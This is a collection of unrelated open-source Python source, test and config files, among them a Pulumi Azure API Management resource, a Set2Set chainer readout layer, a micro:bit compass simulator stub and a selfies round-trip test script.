opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an API Management API Assignment to a Product.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_service = azure.apimanagement.get_service(name="example-api",
resource_group_name="example-resources")
example_api = azure.apimanagement.get_api(name="search-api",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name,
revision="2")
example_product = azure.apimanagement.get_product(product_id="my-product",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
example_product_api = azure.apimanagement.ProductApi("exampleProductApi",
api_name=example_api.name,
product_id=example_product.product_id,
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
```
## Import
API Management Product API's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/productApi:ProductApi example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/service1/products/exampleId/apis/apiId
```
:param str resource_name: The name of the resource.
:param ProductApiArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ProductApiArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ProductApiArgs.__new__(ProductApiArgs)
if api_management_name is None and not opts.urn:
raise TypeError("Missing required property 'api_management_name'")
__props__.__dict__["api_management_name"] = api_management_name
if api_name is None and not opts.urn:
raise TypeError("Missing required property 'api_name'")
__props__.__dict__["api_name"] = api_name
if product_id is None and not opts.urn:
raise TypeError("Missing required property 'product_id'")
__props__.__dict__["product_id"] = product_id
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
super(ProductApi, __self__).__init__(
'azure:apimanagement/productApi:ProductApi',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None) -> 'ProductApi':
"""
Get an existing ProductApi resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ProductApiState.__new__(_ProductApiState)
__props__.__dict__["api_management_name"] = api_management_name
__props__.__dict__["api_name"] = api_name
__props__.__dict__["product_id"] = product_id
__props__.__dict__["resource_group_name"] = resource_group_name
return ProductApi(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Output[str]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@property
@pulumi.getter(name="apiName")
def api_name(self) -> pulumi.Output[str]:
"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@property
@pulumi.getter(name="productId")
def product_id(self) -> pulumi.Output[str]:
"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "product_id")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
|
configs/flownet2/flownet2sd_8x1_slong_chairssdhom_384x448.py | hologerry/mmflow | 481 | 46232 | <reponame>hologerry/mmflow<filename>configs/flownet2/flownet2sd_8x1_slong_chairssdhom_384x448.py
_base_ = [
'../_base_/models/flownet2/flownet2sd.py',
'../_base_/datasets/chairssdhom_384x448.py',
'../_base_/schedules/schedule_s_long.py', '../_base_/default_runtime.py'
]
|
data_collection/gazette/spiders/sc_sao_domingos.py | kaiocp/querido-diario | 454 | 46289 | <reponame>kaiocp/querido-diario
from gazette.spiders.base.fecam import FecamGazetteSpider
class ScSaoDomingosSpider(FecamGazetteSpider):
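    # Gazette spider for São Domingos (SC): reuses the FECAM base spider, supplying only the city-specific entity query and territory id below.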
name = "sc_sao_domingos"
FECAM_QUERY = "cod_entidade:244"
TERRITORY_ID = "4216107"
|
splearn/cluster/tests/test_k_means.py | dtrckd/sparkit-learn | 1,219 | 46310 | import numpy as np
from sklearn.cluster import KMeans
from splearn.cluster import SparkKMeans
from splearn.utils.testing import SplearnTestCase, assert_array_almost_equal
class TestKMeans(SplearnTestCase):
def test_same_centroids(self):
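        # Fit scikit-learn's KMeans locally and SparkKMeans on the RDD version of the same blobs, then check that the sorted centroids agree to 4 decimals.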
X, y, X_rdd = self.make_blobs(centers=4, n_samples=200000)
local = KMeans(n_clusters=4, init='k-means++', random_state=42)
dist = SparkKMeans(n_clusters=4, init='k-means++', random_state=42)
local.fit(X)
dist.fit(X_rdd)
local_centers = np.sort(local.cluster_centers_, axis=0)
dist_centers = np.sort(dist.cluster_centers_, axis=0)
assert_array_almost_equal(local_centers, dist_centers, decimal=4)
|
chrome/common/extensions/docs/server2/app_yaml_helper_test.py | iplo/Chain | 231 | 46368 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from app_yaml_helper import AppYamlHelper
from extensions_paths import SERVER2
from host_file_system_provider import HostFileSystemProvider
from mock_file_system import MockFileSystem
from object_store_creator import ObjectStoreCreator
from test_file_system import MoveTo, TestFileSystem
from test_util import DisableLogging
_ExtractVersion, _IsGreater, _GenerateAppYaml = (
AppYamlHelper.ExtractVersion,
AppYamlHelper.IsGreater,
AppYamlHelper.GenerateAppYaml)
class AppYamlHelperTest(unittest.TestCase):
def testExtractVersion(self):
def run_test(version):
self.assertEqual(version, _ExtractVersion(_GenerateAppYaml(version)))
run_test('0')
run_test('0-0')
run_test('0-0-0')
run_test('1')
run_test('1-0')
run_test('1-0-0')
run_test('1-0-1')
run_test('1-1-0')
run_test('1-1-1')
run_test('2-0-9')
run_test('2-0-12')
run_test('2-1')
run_test('2-1-0')
run_test('2-11-0')
run_test('3-1-0')
run_test('3-1-3')
run_test('3-12-0')
def testIsGreater(self):
def assert_is_greater(lhs, rhs):
self.assertTrue(_IsGreater(lhs, rhs), '%s is not > %s' % (lhs, rhs))
self.assertFalse(_IsGreater(rhs, lhs),
'%s should not be > %s' % (rhs, lhs))
assert_is_greater('0-0', '0')
assert_is_greater('0-0-0', '0')
assert_is_greater('0-0-0', '0-0')
assert_is_greater('1', '0')
assert_is_greater('1', '0-0')
assert_is_greater('1', '0-0-0')
assert_is_greater('1-0', '0-0')
assert_is_greater('1-0-0-0', '0-0-0')
assert_is_greater('2-0-12', '2-0-9')
assert_is_greater('2-0-12', '2-0-9-0')
assert_is_greater('2-0-12-0', '2-0-9')
assert_is_greater('2-0-12-0', '2-0-9-0')
assert_is_greater('2-1', '2-0-9')
assert_is_greater('2-1', '2-0-12')
assert_is_greater('2-1-0', '2-0-9')
assert_is_greater('2-1-0', '2-0-12')
assert_is_greater('3-1-0', '2-1')
assert_is_greater('3-1-0', '2-1-0')
assert_is_greater('3-1-0', '2-11-0')
assert_is_greater('3-1-3', '3-1-0')
assert_is_greater('3-12-0', '3-1-0')
assert_is_greater('3-12-0', '3-1-3')
assert_is_greater('3-12-0', '3-1-3-0')
@DisableLogging('warning')
def testInstanceMethods(self):
test_data = {
'app.yaml': _GenerateAppYaml('1-0'),
'app_yaml_helper.py': 'Copyright notice etc'
}
updates = []
# Pass a specific file system at head to the HostFileSystemProvider so that
# we know it's always going to be backed by a MockFileSystem. The Provider
# may decide to wrap it in caching etc.
file_system_at_head = MockFileSystem(
TestFileSystem(test_data, relative_to=SERVER2))
def apply_update(update):
update = MoveTo(SERVER2, update)
file_system_at_head.Update(update)
updates.append(update)
def host_file_system_constructor(branch, revision=None):
self.assertEqual('trunk', branch)
self.assertTrue(revision is not None)
return MockFileSystem.Create(
TestFileSystem(test_data, relative_to=SERVER2), updates[:revision])
object_store_creator = ObjectStoreCreator.ForTest()
host_file_system_provider = HostFileSystemProvider(
object_store_creator,
default_trunk_instance=file_system_at_head,
constructor_for_test=host_file_system_constructor)
helper = AppYamlHelper(object_store_creator, host_file_system_provider)
def assert_is_up_to_date(version):
self.assertTrue(helper.IsUpToDate(version),
'%s is not up to date' % version)
self.assertRaises(ValueError,
helper.GetFirstRevisionGreaterThan, version)
self.assertEqual(0, helper.GetFirstRevisionGreaterThan('0-5-0'))
assert_is_up_to_date('1-0-0')
assert_is_up_to_date('1-5-0')
# Revision 1.
apply_update({
'app.yaml': _GenerateAppYaml('1-5-0')
})
self.assertEqual(0, helper.GetFirstRevisionGreaterThan('0-5-0'))
self.assertEqual(1, helper.GetFirstRevisionGreaterThan('1-0-0'))
assert_is_up_to_date('1-5-0')
assert_is_up_to_date('2-5-0')
# Revision 2.
apply_update({
'app_yaml_helper.py': 'fixed a bug'
})
self.assertEqual(0, helper.GetFirstRevisionGreaterThan('0-5-0'))
self.assertEqual(1, helper.GetFirstRevisionGreaterThan('1-0-0'))
assert_is_up_to_date('1-5-0')
assert_is_up_to_date('2-5-0')
# Revision 3.
apply_update({
'app.yaml': _GenerateAppYaml('1-6-0')
})
self.assertEqual(0, helper.GetFirstRevisionGreaterThan('0-5-0'))
self.assertEqual(1, helper.GetFirstRevisionGreaterThan('1-0-0'))
self.assertEqual(3, helper.GetFirstRevisionGreaterThan('1-5-0'))
assert_is_up_to_date('2-5-0')
# Revision 4.
apply_update({
'app.yaml': _GenerateAppYaml('1-8-0')
})
# Revision 5.
apply_update({
'app.yaml': _GenerateAppYaml('2-0-0')
})
# Revision 6.
apply_update({
'app.yaml': _GenerateAppYaml('2-2-0')
})
# Revision 7.
apply_update({
'app.yaml': _GenerateAppYaml('2-4-0')
})
# Revision 8.
apply_update({
'app.yaml': _GenerateAppYaml('2-6-0')
})
self.assertEqual(0, helper.GetFirstRevisionGreaterThan('0-5-0'))
self.assertEqual(1, helper.GetFirstRevisionGreaterThan('1-0-0'))
self.assertEqual(3, helper.GetFirstRevisionGreaterThan('1-5-0'))
self.assertEqual(5, helper.GetFirstRevisionGreaterThan('1-8-0'))
self.assertEqual(6, helper.GetFirstRevisionGreaterThan('2-0-0'))
self.assertEqual(6, helper.GetFirstRevisionGreaterThan('2-1-0'))
self.assertEqual(7, helper.GetFirstRevisionGreaterThan('2-2-0'))
self.assertEqual(7, helper.GetFirstRevisionGreaterThan('2-3-0'))
self.assertEqual(8, helper.GetFirstRevisionGreaterThan('2-4-0'))
self.assertEqual(8, helper.GetFirstRevisionGreaterThan('2-5-0'))
assert_is_up_to_date('2-6-0')
assert_is_up_to_date('2-7-0')
if __name__ == '__main__':
unittest.main()
|
tf_quant_finance/rates/swap_curve_common.py | slowy07/tf-quant-finance | 3,138 | 46398 | <filename>tf_quant_finance/rates/swap_curve_common.py
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities and data structures for swap curve construction."""
from tf_quant_finance import types
from tf_quant_finance import utils
__all__ = [
'SwapCurveBuilderResult'
]
@utils.dataclass
class SwapCurveBuilderResult:
"""Swap curve calibration results.
Attributes:
times: Rank 1 real `Tensor`. Times for the computed rates.
rates: Rank 1 `Tensor` of the same dtype as `times`. The inferred zero
rates.
discount_factors: Rank 1 `Tensor` of the same dtype as `times`. The inferred
discount factors.
initial_rates: Rank 1 `Tensor` of the same dtype as `times`. The initial
guess for the rates.
converged: Scalar boolean `Tensor`. Whether the procedure converged.
failed: Scalar boolean `Tensor`. Whether the procedure failed.
iterations: Scalar int32 `Tensor`. Number of iterations performed.
objective_value: Scalar real `Tensor`. The objective function at the optimal
      solution.
"""
times: types.RealTensor
rates: types.RealTensor
discount_factors: types.RealTensor
initial_rates: types.RealTensor
converged: types.BoolTensor
failed: types.BoolTensor
iterations: types.IntTensor
objective_value: types.RealTensor
|
src/RobotFrameworkCore/org.robotframework.ide.core-functions/src/test/python/scripts/res_test_robot_session_server/a/lib.py | alex729/RED | 375 | 46401 | <filename>src/RobotFrameworkCore/org.robotframework.ide.core-functions/src/test/python/scripts/res_test_robot_session_server/a/lib.py<gh_stars>100-1000
def kw1():
pass |
mayan/apps/common/tests/test_classes.py | atitaya1412/Mayan-EDMS | 343 | 46431 | from django.db import models
from mayan.apps.testing.tests.base import BaseTestCase
from ..classes import QuerysetParametersSerializer
class QuerysetParametersSerializerTestCase(BaseTestCase):
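    # Each test decomposes the parameters of a queryset method call into a serializable form, rebuilds the queryset from them, and asserts the rebuilt queryset matches the original.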
def setUp(self):
super().setUp()
self.TestModelParent = self._create_test_model(
model_name='TestModelParent'
)
self.TestModelChild = self._create_test_model(
fields={
'parent': models.ForeignKey(
on_delete=models.CASCADE, related_name='children',
to='TestModelParent'
)
}, model_name='TestModelChild'
)
self._test_object_parent = self.TestModelParent.objects.create()
self.TestModelChild.objects.create(parent_id=self._test_object_parent.pk)
def _assertQuerysetEqual(self):
rebuilt_items = list(map(repr, self.queryset_rebuilt))
self.assertQuerysetEqual(
qs=self.queryset_original, values=rebuilt_items
)
def test_without_kwargs(self):
self.queryset_original = self.TestModelParent.objects.all()
decomposed_queryset = QuerysetParametersSerializer.decompose(
_model=self.TestModelParent, _method_name='all'
)
self.queryset_rebuilt = QuerysetParametersSerializer.rebuild(
decomposed_queryset=decomposed_queryset
)
self._assertQuerysetEqual()
def test_foreign_key_model(self):
self.queryset_original = self.TestModelChild.objects.all()
decomposed_queryset = QuerysetParametersSerializer.decompose(
_model=self.TestModelChild, _method_name='filter',
parent=self._test_object_parent
)
self.queryset_rebuilt = QuerysetParametersSerializer.rebuild(
decomposed_queryset=decomposed_queryset
)
self._assertQuerysetEqual()
def test_foreign_key_model_id_query(self):
self.queryset_original = self.TestModelChild.objects.all()
decomposed_queryset = QuerysetParametersSerializer.decompose(
_model=self.TestModelChild, _method_name='filter',
parent_id=self._test_object_parent.pk
)
self.queryset_rebuilt = QuerysetParametersSerializer.rebuild(
decomposed_queryset=decomposed_queryset
)
self._assertQuerysetEqual()
|
service_catalog/tables/global_hook_tables.py | LaudateCorpus1/squest | 112 | 46434 | from django_tables2 import TemplateColumn
from service_catalog.models import GlobalHook
from Squest.utils.squest_table import SquestTable
class GlobalHookTable(SquestTable):
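    # Listing table for global hooks; the state and actions columns are rendered through the custom column templates referenced below.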
state = TemplateColumn(template_name='custom_columns/global_hook_state.html')
actions = TemplateColumn(template_name='custom_columns/global_hook_actions.html', orderable=False)
class Meta:
model = GlobalHook
attrs = {"id": "global_hook_table", "class": "table squest-pagination-tables"}
fields = ("name", "model", "state", "job_template", "actions")
|
src/micropython/microbit/__model/compass.py | julianrendell/vscode-python-devicesimulator | 151 | 46474 | <gh_stars>100-1000
from common import utils
from common.telemetry import telemetry_py
from common.telemetry_events import TelemetryEvent
class Compass:
# The implementation is based off of https://microbit-micropython.readthedocs.io/en/v1.0.1/compass.html.
def calibrate(self):
"""
This function is not implemented in the simulator.
Starts the calibration process. When this function is called on the physical device, an instructive message will be scrolled to the user after which they will need to rotate the device in order to draw a circle on the LED display on the actual device.
"""
utils.print_for_unimplemented_functions(Compass.calibrate.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def is_calibrated(self):
"""
This function is not implemented in the simulator.
Returns ``True`` if the compass has been successfully calibrated, and
returns ``False`` otherwise.
"""
utils.print_for_unimplemented_functions(Compass.is_calibrated.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def clear_calibration(self):
"""
This function is not implemented in the simulator.
Undoes the calibration, making the compass uncalibrated again.
"""
utils.print_for_unimplemented_functions(Compass.clear_calibration.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def get_x(self):
"""
This function is not implemented in the simulator.
Gives the reading of the magnetic field strength on the ``x`` axis in nano
tesla, as a positive or negative integer, depending on the direction of the
field.
"""
utils.print_for_unimplemented_functions(Compass.get_x.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def get_y(self):
"""
This function is not implemented in the simulator.
Gives the reading of the magnetic field strength on the ``y`` axis in nano
tesla, as a positive or negative integer, depending on the direction of the
field.
"""
utils.print_for_unimplemented_functions(Compass.get_y.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def get_z(self):
"""
This function is not implemented in the simulator.
Gives the reading of the magnetic field strength on the ``z`` axis in nano
tesla, as a positive or negative integer, depending on the direction of the
field.
"""
utils.print_for_unimplemented_functions(Compass.get_z.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def heading(self):
"""
This function is not implemented in the simulator.
Gives the compass heading, calculated from the above readings, as an
integer in the range from 0 to 360, representing the angle in degrees,
clockwise, with north as 0.
"""
utils.print_for_unimplemented_functions(Compass.heading.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
def get_field_strength(self):
"""
This function is not implemented in the simulator.
Returns an integer indication of the magnitude of the magnetic field around
the device in nano tesla.
"""
utils.print_for_unimplemented_functions(Compass.get_field_strength.__name__)
telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)
|
library/test/test_compiler/sbs_code_tests/95_annotation_global.py | creativemindplus/skybison | 278 | 46518 | # Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
def f():
(some_global): int
print(some_global)
# EXPECTED:
[
...,
LOAD_CONST(Code((1, 0))),
LOAD_CONST('f'),
MAKE_FUNCTION(0),
STORE_NAME('f'),
LOAD_CONST(None),
RETURN_VALUE(0),
CODE_START('f'),
~LOAD_CONST('int'),
]
|
python/examples/depthnet.py | jwkim386/Jetson_Inference | 5,788 | 46531 | <gh_stars>1000+
#!/usr/bin/python3
#
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
import jetson.inference
import jetson.utils
import argparse
import sys
from depthnet_utils import depthBuffers
# parse the command line
parser = argparse.ArgumentParser(description="Mono depth estimation on a video/image stream using depthNet DNN.",
formatter_class=argparse.RawTextHelpFormatter, epilog=jetson.inference.depthNet.Usage() +
jetson.utils.videoSource.Usage() + jetson.utils.videoOutput.Usage() + jetson.utils.logUsage())
parser.add_argument("input_URI", type=str, default="", nargs='?', help="URI of the input stream")
parser.add_argument("output_URI", type=str, default="", nargs='?', help="URI of the output stream")
parser.add_argument("--network", type=str, default="fcn-mobilenet", help="pre-trained model to load, see below for options")
parser.add_argument("--visualize", type=str, default="input,depth", help="visualization options (can be 'input' 'depth' 'input,depth'")
parser.add_argument("--depth-size", type=float, default=1.0, help="scales the size of the depth map visualization, as a percentage of the input size (default is 1.0)")
parser.add_argument("--filter-mode", type=str, default="linear", choices=["point", "linear"], help="filtering mode used during visualization, options are:\n 'point' or 'linear' (default: 'linear')")
parser.add_argument("--colormap", type=str, default="viridis-inverted", help="colormap to use for visualization (default is 'viridis-inverted')",
choices=["inferno", "inferno-inverted", "magma", "magma-inverted", "parula", "parula-inverted",
"plasma", "plasma-inverted", "turbo", "turbo-inverted", "viridis", "viridis-inverted"])
try:
opt = parser.parse_known_args()[0]
except:
print("")
parser.print_help()
sys.exit(0)
# load the segmentation network
net = jetson.inference.depthNet(opt.network, sys.argv)
# create buffer manager
buffers = depthBuffers(opt)
# create video sources & outputs
input = jetson.utils.videoSource(opt.input_URI, argv=sys.argv)
output = jetson.utils.videoOutput(opt.output_URI, argv=sys.argv)
# process frames until user exits
while True:
# capture the next image
img_input = input.Capture()
# allocate buffers for this size image
buffers.Alloc(img_input.shape, img_input.format)
# process the mono depth and visualize
net.Process(img_input, buffers.depth, opt.colormap, opt.filter_mode)
# composite the images
if buffers.use_input:
jetson.utils.cudaOverlay(img_input, buffers.composite, 0, 0)
if buffers.use_depth:
jetson.utils.cudaOverlay(buffers.depth, buffers.composite, img_input.width if buffers.use_input else 0, 0)
# render the output image
output.Render(buffers.composite)
# update the title bar
output.SetStatus("{:s} | {:s} | Network {:.0f} FPS".format(opt.network, net.GetNetworkName(), net.GetNetworkFPS()))
# print out performance info
jetson.utils.cudaDeviceSynchronize()
net.PrintProfilerTimes()
# exit on input/output EOS
if not input.IsStreaming() or not output.IsStreaming():
break
|
misc/kwcheck.py | zzahti/skytools | 116 | 46532 | <reponame>zzahti/skytools
#! /usr/bin/env python
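# Compare PostgreSQL's keyword list (kwlist.h) against skytools' identifier-quoting
# keyword map and report newly reserved, obsolete, and all known keywords.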
import sys
import re
import pkgloader
pkgloader.require('skytools', '3.0')
import skytools.quoting
kwmap = skytools.quoting._ident_kwmap
fn = "/opt/src/pgsql/postgresql/src/include/parser/kwlist.h"
if len(sys.argv) == 2:
fn = sys.argv[1]
rc = re.compile(r'PG_KEYWORD[(]"(.*)" , \s* \w+ , \s* (\w+) [)]', re.X)
data = open(fn, 'r').read()
full_map = {}
cur_map = {}
print "== new =="
for kw, cat in rc.findall(data):
full_map[kw] = 1
if cat == 'UNRESERVED_KEYWORD':
continue
if cat == 'COL_NAME_KEYWORD':
continue
cur_map[kw] = 1
if kw not in kwmap:
print kw, cat
kwmap[kw] = 1
print "== obsolete =="
kws = kwmap.keys()
kws.sort()
for k in kws:
if k not in full_map:
print k, '(not in full_map)'
elif k not in cur_map:
print k, '(not in cur_map)'
print "== full list =="
ln = ""
for k in kws:
ln += '"%s":1, ' % k
if len(ln) > 70:
print ln.strip()
ln = ""
print ln.strip()
|
tests/run_on_large_dataset.py | ur-whitelab/selfies | 367 | 46537 | """Script for testing selfies against large datasets.
"""
import argparse
import pathlib
import pandas as pd
from rdkit import Chem
from tqdm import tqdm
import selfies as sf
parser = argparse.ArgumentParser()
parser.add_argument("--data_path", type=str, default="version.smi.gz")
parser.add_argument("--col_name", type=str, default="isosmiles")
parser.add_argument("--sep", type=str, default=r"\s+")
parser.add_argument("--start_from", type=int, default=0)
args = parser.parse_args()
TEST_DIR = pathlib.Path(__file__).parent
TEST_SET_PATH = TEST_DIR / "test_sets" / args.data_path
ERROR_LOG_DIR = TEST_DIR / "error_logs"
ERROR_LOG_DIR.mkdir(exist_ok=True, parents=True)
def make_reader():
return pd.read_csv(TEST_SET_PATH, sep=args.sep, chunksize=10000)
def roundtrip_translation():
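    # Encode every SMILES to SELFIES and decode it back, logging any molecule that fails to round-trip to the same canonical SMILES.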
sf.set_semantic_constraints("hypervalent")
n_entries = 0
for chunk in make_reader():
n_entries += len(chunk)
pbar = tqdm(total=n_entries)
reader = make_reader()
error_log = open(ERROR_LOG_DIR / f"{TEST_SET_PATH.stem}.txt", "a+")
curr_idx = 0
for chunk_idx, chunk in enumerate(reader):
for in_smiles in chunk[args.col_name]:
pbar.update(1)
curr_idx += 1
if curr_idx < args.start_from:
continue
in_smiles = in_smiles.strip()
mol = Chem.MolFromSmiles(in_smiles, sanitize=True)
if (mol is None) or ("*" in in_smiles):
continue
try:
selfies = sf.encoder(in_smiles, strict=True)
out_smiles = sf.decoder(selfies)
except (sf.EncoderError, sf.DecoderError):
error_log.write(in_smiles + "\n")
tqdm.write(in_smiles)
continue
if not is_same_mol(in_smiles, out_smiles):
error_log.write(in_smiles + "\n")
tqdm.write(in_smiles)
error_log.close()
def is_same_mol(smiles1, smiles2):
try:
can_smiles1 = Chem.CanonSmiles(smiles1)
can_smiles2 = Chem.CanonSmiles(smiles2)
return can_smiles1 == can_smiles2
except Exception:
return False
if __name__ == "__main__":
roundtrip_translation()
|
chainer_chemistry/links/readout/set2set.py | pfnet/chainerchem | 184 | 46540 | from typing import List, Optional # NOQA
import chainer
from chainer import cuda
from chainer import functions
from chainer import links
import numpy # NOQA
class Set2Set(chainer.Chain):
r"""MPNN subsubmodule for readout part.
See: <NAME>+, \
Order Matters: Sequence to sequence for sets. November 2015.
`arXiv:1511.06391 <https://arxiv.org/abs/1511.06391>`
Args:
in_channels (int): dimension of input feature vector
n_layers (int): number of LSTM layers
Returns (chainer.Variable):
Output feature vector: (minibatch, in_channels * 2)
"""
def __init__(self, in_channels, n_layers=1):
# type: (int, int) -> None
super(Set2Set, self).__init__()
with self.init_scope():
self.lstm_layer = links.NStepLSTM(
n_layers=n_layers,
in_size=in_channels * 2,
out_size=in_channels,
dropout=0)
self.in_channels = in_channels
self.n_layers = n_layers
self.hx = None # type: Optional[chainer.Variable]
self.cx = None # type: Optional[chainer.Variable]
self.q_star = None # type: Optional[List]
def __call__(self, h):
# type: (chainer.Variable) -> chainer.Variable
xp = cuda.get_array_module(h)
mb, node, ch = h.shape # type: int, int, int
if self.q_star is None:
self.q_star = [
xp.zeros((1, self.in_channels * 2)).astype('f')
for _ in range(mb)
]
self.hx, self.cx, q = self.lstm_layer(self.hx, self.cx, self.q_star)
# self.hx: (mb, mb, ch)
# self.cx: (mb, mb, ch)
# q: List[(1, ch) * mb]
q = functions.stack(q) # q: (mb, 1, ch)
q_ = functions.transpose(q, axes=(0, 2, 1)) # q_: (mb, ch, 1)
e = functions.matmul(h, q_) # e: (mb, node, 1)
a = functions.softmax(e) # a: (mb, node, 1)
a = functions.broadcast_to(a, h.shape) # a: (mb, node, ch)
r = functions.sum((a * h), axis=1, keepdims=True) # r: (mb, 1, ch)
q_star_ = functions.concat((q, r), axis=2) # q_star_: (mb, 1, ch*2)
self.q_star = functions.separate(q_star_)
return functions.reshape(q_star_, (mb, ch * 2))
def reset_state(self):
# type: () -> None
self.hx = None
self.cx = None
self.q_star = None
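# Minimal usage sketch (shapes as described in the docstring): for node features h of
# shape (minibatch, num_nodes, in_channels), calling a Set2Set(in_channels) instance on h
# yields a (minibatch, in_channels * 2) readout; reset_state() clears the stored LSTM state.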
|
binding.gyp | dimshik100/Epoc.js | 799 | 46558 | <gh_stars>100-1000
{
"targets": [
{
"target_name": "index",
"sources": [ "epoc.cc"],
"include_dirs" : [
"<!(node -e \"require('nan')\")"
],
"conditions": [
['OS=="mac"', {
"cflags": [ "-m64" ],
"ldflags": [ "-m64" ],
"xcode_settings": {
"OTHER_CFLAGS": ["-ObjC++"],
"ARCHS": [ "x86_64" ]
},
"link_settings": {
"libraries": [
"/Library/Frameworks/edk.framework/edk"
],
"include_dirs": ["./lib/includes/", "./lib/"]
}
}]
]
}
]
}
|
SimCalorimetry/HcalZeroSuppressionProducers/python/NoHcalZeroSuppression_cff.py | ckamtsikis/cmssw | 852 | 46571 | <filename>SimCalorimetry/HcalZeroSuppressionProducers/python/NoHcalZeroSuppression_cff.py
# Fragment to switch off HCAL zero suppression as an option
# by cmsDriver customisation
# to generate Unsuppressed digis, one has to set the following parameter:
# process.simHcalDigis.useConfigZSvalues = 1
# to generate suppressed digis, useConfigZSvalues should be set to 0
import FWCore.ParameterSet.Config as cms
def customise(process):
# process.hcalDigiSequence.replace(process.simHcalDigis,cms.SequencePlaceholder("simHcalDigis"))
# process.load("SimCalorimetry.HcalZeroSuppressionProducers.hcalDigisNoSuppression_cfi")
process.simHcalDigis.HBlevel = -999
process.simHcalDigis.HElevel = -999
process.simHcalDigis.HOlevel = -999
process.simHcalDigis.HFlevel = -999
process.simHcalDigis.useConfigZSvalues = 1
return(process)
|
